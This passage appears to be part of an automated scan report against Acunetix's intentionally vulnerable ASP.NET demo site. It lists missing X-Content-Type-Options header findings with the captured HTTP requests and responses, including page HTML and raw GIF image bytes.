value="/wEWVwKqq9H0CQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ads/acunetix.gif
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 341 bytes.	GET http://testaspnet.vulnweb.com/ads/acunetix.gif HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/ads/def.html Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 247 bytes.	HTTP/1.1 200 OK Content-Type: image/gif Last-Modified: Thu, 29 May 2008 14:36:52 GMT Accept-Ranges: bytes ETag: "eb3686f99c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 3048
Response Body - size: 3,048 bytes.	GIF89a ÷å1:555øõõäääÑÑÑªªªÚÚÚiiiúÕÖä3¯®® ÒÒÒ111î\|èCJèMT¼¼¼æææáááõ²µä$-êU[þüüAAA^^^æ:Bvvv>>>§§§â!÷ââímrá ÁÁÁùÌÎºººìz···òTTTò«®íkkk¸¸¸cccmmmï ìdjÃÃÃNNN"""ñ¿Áìqvò¥§zzzttt888ñØØØÕÕÕrssfffËËËýóóùññ÷æç÷ÝÝZZZ}}}FFFDDDó»½HHHçFM---¾¿¿æBISSS%%%```&&&XXXâøÇÉxxx JJJé_e*:::©¨¨ïâêioã$â!áæ/8ä(âùùù÷÷÷øøøÿþþÿÿþÿþÿþÿÿþþÿþÿþðððeeeõõõúûúíííóóó´´´°°°ùùúûúúúúûìììñññ÷÷øôôôûûúýýý÷ø÷ïïïµµµòòòëëëêêêøø÷¤¤¤èèèÌÌÌÍÍÍßßßÈÈÈ³³³ø÷ø¡¡¡ÇÇÇîîî²²²~~~ QQQùúú¥¥¥ùúù×××ÜÜÜÏÏÏ÷øøãããÝÝÝÆÆÆLLLöÑÓpppð¢¢¢ûûüûøødddâââúÜÝíç@GÉÉÉÞÞÞþúúoooñðñòúûûOOOÝÜÝðûÝßôôõõõôúÙÚððñôÉËèHNâãâó¡îw\|î¤¨ë`fïîqxíäRQQôÆÈûßàííîóÝÞöÚÚúÏÑð°ã&ñ´¶á{{{ÅÅÅøÞßöÁÂúúùûÞßîûàâúêëùÓÔýïïöööûûûúúúþþþüüüá ÿÿÿ!ù, ÿ÷ H° Á\È°¡Ã oÁ²` `rP/O=~öé§?zòDÊÉã¾>}Æ\|Ó£>\|þå8'L0ùÀyr'A=æÙóï_Hì¹ç?=2O\ºàÓ¡Mkº¬Jðþ¤i?Jû>õsO×{\|5µûÏI=ÿ~ÁãeC,´s/ß¦æÁ9r¤ã=V¹b&iÕ©È8û(\|õsSÀ!k;§ë=û ügçß=}¬ÚÕc©²hìÞÄ¾§÷IæÚ'¬ÞÈ£AÓ¯ºuën0X@½»÷ïàÃÿO¾\|xFÀÓFÔcæÿñëîäëøñC(c>ßA(WÞ>Lòñ%Ç)äSÿázÁu'`\|F&ùuxEGÀÁÀÍhò-ÀÝÐg0TIdrxtgGòAS¨p£üSÁ.jØè§gGSh;l°Â\|ýÑ Q ¥Å2¬ðO3ìrÀ ÿ°"Ãü&d½2ÃDj7y\|HeºåÖ¬¸UHdùÀÂ¢æ d !Ý²Z4ÏhU±ÂY:cwM¬A©[V4ÿÙ¾JÉ?¸uÈ?àV%Íî@ö' JÂB¯ºe¾úóhS¢;ÐT¦þlÚé§þ©á±·@ÇIhEQ-ZÒÑÞj®M©â@6[G6uÈ&lé´XÐð9ÌÖµÿl è8¼¢ðª1È?à§ 6ÅºhEBx0ïÅ¨ S"xá¡ü CTñÏ¾híÚÔnuÐT%nÁðÏÿ¤ ðÖt¿ñê!ðZÛ&ÒuSáOY2§'kîÊn!Jd¯$ÿÊÀ¥ÿ<â[@·Hnafz4¥Óþ8ý-ä2ðÉ> åÀÈóPÂrÈ¡ðÙ9ZbwWÀ¼FâáÞó·ßjJwd(«2ËöB'[l4Õ[SxGyË%4E¡zA.ù?©TÛLôÂ)ß?Ü PÄJ:MR-à \|ñzpgxsò¹hqIw1¸õCS¸ #A¨)qqt: -´¨2ü<D Ð:yXÆ}<Ô¦XÂ-¨'õ¢Åå_Ýæ7¬amñDµPÑ8ÌawÀ 5_YÿÕÈð#¼þaÌm¨Ùá!pgnÙÛwJPG©À-J# qg·Ý¡EÌ'fø?¤g[¯ÒB×¸6 Òòmà!8Pã#Àìñ6x øÜò ðPm}`óGÉÃMÝoº£?ÐØ5ðfiÙÀ@ÊRg¨ÂþAÇ12tKÈ¡½/èða8xÈø([bÓípËð! âóÏ<½fÍ¤GÅ$Äé<hâ¢Z«ÀÇ#Ðe àcèLç þ@t¢H Y·<ã¡P´aÿLB\ÀCÛÀ:$à#b>P+"4ø¸Å ^h&&ÀcRuÐ¬'ZÚÍmvóßDK8ñÁ@´t¢øèú£ô´ç1;q:/ j3Å!&ÞªÁÒà!^Üá9p@ñÔªv ZÀSà! ªOÅG2üÑY<µWhÀ!¢%O}Ä6ñÖ§-xª'jÅÔõhAªÂUþ ÂZR<¬2hÙf<âPÖÑ.x(¤Àº! Il!QþØA91 pbpYÅ$°¡·ÿ 8´ØDoýaGL`8°©?< F4bs ni%A»¾ØM&Z"à¡ÕÐlýÑ<Â¹p4QZ4vÀC-¾èRój-AhD Ú¡aà! »Î þæ§xH0,(Å5-H0Q¶(!ûqñFÀb(±Í;HXÂÖ¥OEEÀU°!ZvSÀhéÐQ$¸µ &Lô xh\|` Àý A ìP¢æç vÈ²~ZJyÕ2íPnË8³tP6EEÿc&1Z<5Û!ÕêÁ'8nÒvnÀx¿`ûcvFm=1Á-;@ÖúDH! ë\ D<:ù¡Ô t2@%D 3 c¶,Ô`1c0ÁZ®t À}nW°+m\|´Æâ¡fZxAxQ [ E,*k;dÆ@À1±V£vXv`¨9U@Àkdú:qÐ>ö)\AOà·>&7\àEP¡ ìûø¾ïK4áH 2AñS 8(Ðq}\"âÅè8">@©8Â( 0;\à(ÆÃ#þ\|xçø ø#ôNèãø!Á<ô¦ßÜÉø¹À9ø-ªÜêú¨º (nuEx}ß_¿¹Ó~sªoß^Çú¾µ¬ìÜõ¡¹âsï83Þ\|äÄ²à¿þðÏÇ;F 8\ÀºH¼ä'OùÊ[þòÏ¼æ7?y<ðãó ½èGOúÒþô¨O½êWÏúÖ»þõ°½ìgOûÚÇ> ;
URL	http://testaspnet.vulnweb.com/ads/def.html
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 363 bytes.	GET http://testaspnet.vulnweb.com/ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 246 bytes.	HTTP/1.1 200 OK Content-Type: text/html Last-Modified: Fri, 24 May 2019 07:50:37 GMT Accept-Ranges: bytes ETag: "eb6cf45f512d51:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 488
Response Body - size: 488 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title></title> <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1"> <meta name="ProgId" content="VisualStudio.HTML"> <meta name="Originator" content="Microsoft Visual Studio .NET 7.1"> </head> <body> <P align="center"><STRONG>Is your website hackable?<BR> check with<BR> <IMG src="acunetix.gif"><BR> Web Vulnerability Scanner</STRONG></P> </body> </html>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 330 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 13859
Response Body - size: 13,859 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk/TUy" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKDytHbBQKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a 